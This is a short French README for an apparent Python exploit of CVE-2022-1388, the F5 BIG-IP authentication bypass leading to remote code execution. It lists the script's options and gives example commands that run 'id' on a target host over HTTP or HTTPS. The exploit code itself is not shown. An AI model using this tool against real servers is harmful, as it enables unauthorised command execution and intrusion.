
Ce dépôt contient l'exploit Python pour CVE-2022-1388 (contournement d'authentification de F5 BIG-IP menant à une exécution de code à distance)
Ce dépôt contient le code d'exploit Python pour CVE-2022-1388 (F5's BIG-IP RCE)
usage: exploit.py [-h] -t TARGET -p PORT -c CMD [--ssl]
options:
-h, --help affiche ce message d'aide et quitte
-t TARGET, --target TARGET
Spécifiez l'adresse IP / le nom de domaine du serveur vulnérable
-p PORT, --port PORT Spécifiez le numéro de port du serveur vulnérable
-c CMD, --cmd CMD Spécifiez la commande que vous souhaitez exécuter
--ssl Spécifiez cet argument optionnel si le serveur utilise SSL
Exemple -
Pour un serveur web qui utilise HTTPS et écoute sur le port 8443 à 192.168.0.13
./exploit.py -t 192.168.0.13 -p 8443 -c 'id' --ssl
Pour un serveur web qui utilise HTTP et écoute sur le port 1346 à 192.168.0.13
./exploit.py -t 192.168.0.13 -p 1346 -c 'id'